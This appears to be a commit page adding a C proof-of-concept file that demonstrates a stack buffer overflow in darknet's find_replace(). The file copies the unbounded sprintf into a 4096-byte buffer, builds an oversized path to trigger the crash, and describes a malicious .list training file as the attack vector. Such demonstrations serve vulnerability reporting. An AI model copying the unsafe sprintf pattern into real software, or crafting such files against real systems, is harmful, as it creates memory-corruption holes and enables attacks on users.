Upload poc_sprintf_overflow.c with huggingface_hub
Browse files- poc_sprintf_overflow.c +74 -0
poc_sprintf_overflow.c
ADDED
|
@@ -0,0 +1,74 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
/*
|
| 2 |
+
* PoC: Stack buffer overflow in find_replace() — src/utils.c:216-230
|
| 3 |
+
*
|
| 4 |
+
* Vulnerability: find_replace() uses a fixed char buffer[4096] with sprintf()
|
| 5 |
+
* and has no bounds checking. When called with a string > 4096 chars,
|
| 6 |
+
* sprintf(buffer, "%s", str) overflows the stack buffer.
|
| 7 |
+
*
|
| 8 |
+
* Attack vector: Training data paths from .list files are passed to
|
| 9 |
+
* find_replace() via fill_truth_detection() (data.c:450) and
|
| 10 |
+
* find_replace_paths() (data.c:56-64). A malicious .list file with
|
| 11 |
+
* paths > 4096 chars triggers the overflow.
|
| 12 |
+
*
|
| 13 |
+
* Also: data.c:61 has char replaced[4096] — another stack buffer overflow
|
| 14 |
+
* target via the same path.
|
| 15 |
+
*
|
| 16 |
+
* This harness demonstrates the overflow by calling find_replace() directly
|
| 17 |
+
* with an oversized string, simulating what happens when darknet processes
|
| 18 |
+
* a malicious training data file.
|
| 19 |
+
*/
|
| 20 |
+
|
| 21 |
+
#include <stdio.h>
|
| 22 |
+
#include <string.h>
|
| 23 |
+
#include <stdlib.h>
|
| 24 |
+
|
| 25 |
+
/* Exact copy of the vulnerable function from src/utils.c:216-230 */
|
| 26 |
+
void find_replace(char *str, char *orig, char *rep, char *output)
|
| 27 |
+
{
|
| 28 |
+
char buffer[4096] = {0};
|
| 29 |
+
char *p;
|
| 30 |
+
|
| 31 |
+
sprintf(buffer, "%s", str); /* OVERFLOW: str > 4096 */
|
| 32 |
+
if(!(p = strstr(buffer, orig))){
|
| 33 |
+
sprintf(output, "%s", str);
|
| 34 |
+
return;
|
| 35 |
+
}
|
| 36 |
+
|
| 37 |
+
*p = '\0';
|
| 38 |
+
|
| 39 |
+
sprintf(output, "%s%s%s", buffer, rep, p+strlen(orig));
|
| 40 |
+
}
|
| 41 |
+
|
| 42 |
+
int main(int argc, char **argv)
|
| 43 |
+
{
|
| 44 |
+
/* Simulate a malicious image path from a .list file */
|
| 45 |
+
/* In real darknet, this comes from fgetl() reading train.list */
|
| 46 |
+
int path_len = 5000;
|
| 47 |
+
if (argc > 1) path_len = atoi(argv[1]);
|
| 48 |
+
|
| 49 |
+
char *malicious_path = malloc(path_len + 1);
|
| 50 |
+
memset(malicious_path, 'A', path_len);
|
| 51 |
+
|
| 52 |
+
/* Inject "images" at position 100 so find_replace has something to match */
|
| 53 |
+
memcpy(malicious_path + 100, "images", 6);
|
| 54 |
+
|
| 55 |
+
/* End with a valid-looking extension */
|
| 56 |
+
memcpy(malicious_path + path_len - 4, ".jpg", 4);
|
| 57 |
+
malicious_path[path_len] = '\0';
|
| 58 |
+
|
| 59 |
+
printf("[*] PoC: find_replace() stack buffer overflow (src/utils.c:221)\n");
|
| 60 |
+
printf("[*] Input string length: %d bytes\n", path_len);
|
| 61 |
+
printf("[*] Fixed buffer size: 4096 bytes\n");
|
| 62 |
+
printf("[*] Overflow: %d bytes past buffer\n", path_len - 4096);
|
| 63 |
+
printf("[*] Calling find_replace()...\n");
|
| 64 |
+
|
| 65 |
+
/* This is the exact call from data.c:220 / data.c:450 */
|
| 66 |
+
char labelpath[4096];
|
| 67 |
+
find_replace(malicious_path, "images", "labels", labelpath);
|
| 68 |
+
|
| 69 |
+
/* Should never reach here with ASAN */
|
| 70 |
+
printf("[!] If you see this, ASAN is not enabled\n");
|
| 71 |
+
|
| 72 |
+
free(malicious_path);
|
| 73 |
+
return 0;
|
| 74 |
+
}
|